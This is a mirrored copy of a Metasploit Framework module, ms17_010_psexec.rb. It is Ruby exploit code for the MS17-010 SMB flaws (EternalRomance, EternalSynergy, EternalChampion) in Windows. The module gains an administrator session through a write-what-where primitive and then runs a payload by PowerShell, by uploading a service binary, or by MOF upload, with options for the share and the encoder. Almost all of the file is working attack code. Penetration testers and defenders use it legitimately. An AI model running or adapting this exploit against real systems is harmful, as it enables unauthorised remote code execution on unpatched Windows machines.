CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/smb/ms17_010_psexec.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
# Windows XP systems that are not part of a domain default to treating all

7
# network logons as if they were Guest. This prevents SMB relay attacks from

8
# gaining administrative access to these systems. This setting can be found

9
# under:

10
#

11
#  Local Security Settings >

12
#   Local Policies >

13
#    Security Options >

14
#     Network Access: Sharing and security model for local accounts

15


16
class MetasploitModule < Msf::Exploit::Remote

17
  Rank = NormalRanking

18


19
  include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010

20
  include Msf::Exploit::Remote::SMB::Client::Psexec

21
  include Msf::Exploit::Remote::CheckModule

22
  include Msf::Exploit::Powershell

23
  include Msf::Exploit::EXE

24
  include Msf::Exploit::WbemExec

25
  include Msf::Auxiliary::Report

26


27
  def initialize(info = {})

28
    super(update_info(info,

29
      'Name'           => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution',

30
      'Description'    => %q{

31
        This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where

32
        primitive. This will then be used to overwrite the connection session information with as an

33
        Administrator session. From there, the normal psexec payload code execution is done.

34


35
        Exploits a type confusion between Transaction and WriteAndX requests and a race condition in

36
        Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy

37
        exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a

38
        named pipe.

39
      },

40
      'Author'         =>

41
        [

42
          'sleepya',          # zzz_exploit idea and offsets

43
          'zerosum0x0',

44
          'Shadow Brokers',

45
          'Equation Group'

46
        ],

47
      'License'        => MSF_LICENSE,

48
      'DefaultOptions' =>

49
        {

50
          'EXITFUNC' => 'thread',

51
          'CheckModule' => 'auxiliary/scanner/smb/smb_ms17_010',

52
          'WfsDelay' => 10

53
        },

54
      'References'     =>

55
        [

56
          [ 'MSB', 'MS17-010' ],

57
          [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests

58
          [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests

59
          [ 'CVE', '2017-0147'], # for EternalRomance reference

60
          [ 'URL', 'https://github.com/worawit/MS17-010' ],

61
          [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],

62
          [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],

63
        ],

64
      'Payload'        =>

65
        {

66
          'Space'        => 3072,

67
          'DisableNops'  => true

68
        },

69
      'Platform'       => 'win',

70
      'Arch'           => [ARCH_X86, ARCH_X64],

71
      'Targets'        =>

72
        [

73
          [ 'Automatic', { } ],

74
          [ 'PowerShell', { } ],

75
          [ 'Native upload', { } ],

76
          [ 'MOF upload', { } ]

77
        ],

78
      'DefaultTarget'  => 0,

79
      'DisclosureDate' => '2017-03-14',

80
      'Notes' =>

81
          {

82
              'AKA' => [

83
                  'ETERNALSYNERGY',

84
                  'ETERNALROMANCE',

85
                  'ETERNALCHAMPION',

86
                  'ETERNALBLUE'      # does not use any CVE from Blue, but Search should show this, it is preferred

87
              ]

88
          }

89
    ))

90


91
    register_options(

92
      [

93
        OptString.new('SHARE',     [ true, "The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", 'ADMIN$' ])

94
      ])

95


96
    register_advanced_options(

97
      [

98
        OptBool.new('ALLOW_GUEST', [true, "Keep trying if only given guest access", false]),

99
        OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil]),

100
        OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe']),

101
        OptString.new('SERVICE_STUB_ENCODER', [false, "Encoder to use around the service registering stub",nil])

102
      ])

103


104
    deregister_options('SMB::ProtocolVersion')

105
  end

106


107
  def validate_service_stub_encoder!

108
    service_encoder = datastore['SERVICE_STUB_ENCODER']

109
    return if service_encoder.nil? || service_encoder.empty?

110


111
    encoder = framework.encoders[service_encoder]

112
    if encoder.nil?

113
      raise Msf::OptionValidateError.new(

114
        {

115
          'SERVICE_STUB_ENCODER' => "Failed to find encoder #{service_encoder.inspect}"

116
        }

117
      )

118
    end

119
  end

120


121
  def exploit

122
    validate_service_stub_encoder!

123


124
    begin

125
      if datastore['SMBUser'].present?

126
        print_status("Authenticating to #{datastore['RHOST']} as user '#{splitname(datastore['SMBUser'])}'...")

127
      end

128
      eternal_pwn(datastore['RHOST'])

129
      smb_pwn()

130


131
    rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e

132
      print_error("#{e.message}")

133
    rescue ::Errno::ECONNRESET,

134
           ::Rex::Proto::SMB::Exceptions::LoginError,

135
           ::Rex::HostUnreachable,

136
           ::Rex::ConnectionTimeout,

137
           ::Rex::ConnectionRefused  => e

138
      print_error("#{e.class}: #{e.message}")

139
    rescue => error

140
      print_error(error.class.to_s)

141
      print_error(error.message)

142
      print_error(error.backtrace.join("\n"))

143
    ensure

144
      eternal_cleanup()       # restore session

145
    end

146
  end

147


148
  def smb_pwn

149
    service_filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"

150
    service_encoder = datastore['SERVICE_STUB_ENCODER'] || ''

151


152
    case target.name

153
    when 'Automatic'

154
      if powershell_installed?(datastore['SHARE'], datastore['PSH_PATH'])

155
        print_status('Selecting PowerShell target')

156
        execute_powershell_payload

157
      else

158
        print_status('Selecting native target')

159
        native_upload(datastore['SHARE'], service_filename, service_encoder)

160
      end

161
    when 'PowerShell'

162
      execute_powershell_payload

163
    when 'Native upload'

164
      native_upload(datastore['SHARE'], service_filename, service_encoder)

165
    when 'MOF upload'

166
      mof_upload(datastore['SHARE'])

167
    end

168


169
    handler

170
  end

171
end

172


173